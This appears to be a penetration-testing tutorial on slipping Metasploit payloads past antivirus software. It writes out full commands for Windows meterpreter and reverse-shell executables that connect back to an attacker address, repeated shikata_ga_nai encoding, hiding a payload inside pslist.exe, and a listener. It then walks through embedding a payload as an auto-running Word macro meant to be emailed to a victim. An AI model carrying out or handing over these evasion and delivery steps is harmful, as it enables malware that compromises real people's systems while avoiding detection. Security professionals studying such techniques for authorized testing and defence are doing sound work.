A penetration tester simulates an attack on a customer's network by trying to find a way inside. Many such attacks begin with the use of a scanning tool, such as Nexpose, Nessus, or Nmap, to look for network vulnerabilities; however, several of the leading intrusion detection and protection systems are capable of alerting the network owner when a scan is in process. Rather than scanning for an open port, a devious alternative is to email a payload to the victim that will allow the attacker to establish a foothold on the victim's network. The Metasploit framework includes several binary payloads you can use to open an attack by email – if you can slip past the virus scanners.
Metasploit Antivirus Bypass
A skilled intruder who delivers a payload to your network in the form of an email message will want to make sure the payload can evade detection by antivirus software. Most antivirus software vendors use a signature base to identify malicious code. To avoid antivirus detection, an intruder must devise a payload that will not match the available antivirus signatures.
The Metasploit penetration testing framework provides a collection of tools you can use to test a network by attacking it the way an intruder would. Metasploit's msfpayload option lets you create a standalone binary to serve as a malicious payload, and the msfencode option encodes that binary to confuse antivirus scanners. Msfpayload allows you to generate shellcode, executables, and more. To see a list of options, use msfpayload -h at the command line, and to see a list of available shellcode that you can customize for your specific attack, use msfpayload -l. To see a list of options for msfencode, use msfencode -h at the command line. To view which encoders are available, run the msfencode -l command.
Before I encode the payload to bypass antivirus detection, I need to create a standalone binary with msfpayload. The binary launches a simple reverse shell, allowing a remote user to connect to the victim's machine. If the target is a Windows box, I can narrow down the list of available payloads with the
msfpayload -l | grep windows
command, which gives a list of payloads that are specific to Windows operating systems (see Figure 1). I'll start by trying the Windows meterpreter. This payload will connect back to the attacker, injecting the meterpreter server DLL via the Reflective DLL Injection payload (highlighted in Figure 1). The O (capital "oh") command-line argument shows all the available configurable options (see Figure 2).
To create the payload, I use the following command:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.245.134 LPORT=4444 X /root/Desktop/evil.exe
All that's left now is to deliver the executable to the victim, which requires some skill in itself. To catch the connection when the victim runs the executable, I need a listener running on the attack machine:
# msfcli multi/handler payload=windows/meterpreter/reverse_tcp lhost=192.168.1.134 lport=4444 E
This command will open a listener on the local machine over port 4444. Once the victim runs the executable, it will open a meterpreter shell on the victim's Windows box (Figure 3).
Once the payload is working, the next step is to find a way to avoid antivirus detection. The VirusTotal website runs virus scans on file content and reports which scanners detect the file. I'll use VirusTotal to check the results from the previous example and see how many antivirus vendors hit on the exploit. As you can see in Figure 4, many vendors flagged the file.
In the hope of achieving a better result, I'll bring in msfencode to try to get past the antivirus vendors. In this case, I'll pipe the raw output of msfpayload as input to msfencode using the shikata_ga_nai encoder (a name that translates to "nothing can be done" in Japanese). The encoder will output a Windows binary:
# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > /root/Desktop/evil.exe
The results still show several hits with antivirus scanners, so I'll take another approach. Some antivirus vendors rely on signature-based technology, and the shell_reverse_tcp payload shows up right away, so I'll try the alternative windows/shell/reverse_tcp payload instead:
# msfpayload windows/shell/reverse_tcp LHOST=192.168.1.134 LPORT=4444 R | msfencode -t exe -x /root/Desktop/pslist.exe -o /root/Desktop/pslist2.exe -e x86/shikata_ga_nai -c 10
I will also take some additional steps to hide the payload. This time, I'll take an executable from the Sysinternals site called pslist.exe and encode the payload 10 times with shikata_ga_nai. The payload is combined with the Sysinternals tool pslist.exe, and the result is renamed pslist2.exe. Unfortunately (for the attacker), the score at VirusTotal improves only slightly (see Figure 5), although several common scanners did not identify the exploit. To set up a listener, you can again use the msfcli command. If the payload slips through, it will open a shell on my Linux box with admin privileges on the Windows system.
As you can see from the previous attempts, although it is possible to slip past a specific scanner with a specific exploit, in general, virus scanners are very proficient at stripping out dangerous executables. Another way to deliver a dangerous payload is with a Word document. Word documents are commonly sent by email and opened by many people. A Word doc is a great attack vector. Metasploit has some built-in methods for infecting Word documents with malicious Metasploit payloads.
To begin, create the executable payload that will be converted to VBScript:
# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.134 LPORT=4444 ENCODING=shikata_ga_nai X > evilpayload.exe
Now you need to convert this executable to a VBScript with the use of a script found in the Tools section of Metasploit. Next, copy evilpayload.exe to the Tools folder as shown in the following example:
# cp /opt/framework3/msf3/evilpayload.exe /opt/framework3/msf3/tools
Inside the Tools folder is a script called exe2vba.rb. To convert the .exe to a .vbs, issue the following command:
# ruby exe2vba.rb evilpayload.exe evil_payload.vbs
Then copy evil_payload.vbs to a Windows machine that has Microsoft Word installed. Open evil_payload.vbs with Notepad and then open a blank Microsoft Word document. In Microsoft Word 2003, go to Tools | Macros | Visual Basic Editor, or go to View Macros if you are using Microsoft Word 2010. Next, copy the first portion of evil_payload.vbs – from Sub Auto_Open() to End Sub – and paste it into the Visual Basic Editor in either Microsoft Word 2003 or 2007 (see Figure 6).
The next step is to copy the portion from PAYLOAD DATA to the end into the body of the Word document. To verify that this Word document can get past antivirus vendors, upload it to VirusTotal and see if it catches anything (Figure 7). As you can see, the Word doc slips past all the antivirus vendors (see the Results column on the right side of Figure 7). The only hard part will be getting the victim to open the document.
Once you have delivered the Word document to your intended victim, make sure you have the Metasploit client listener up and running on the attack machine.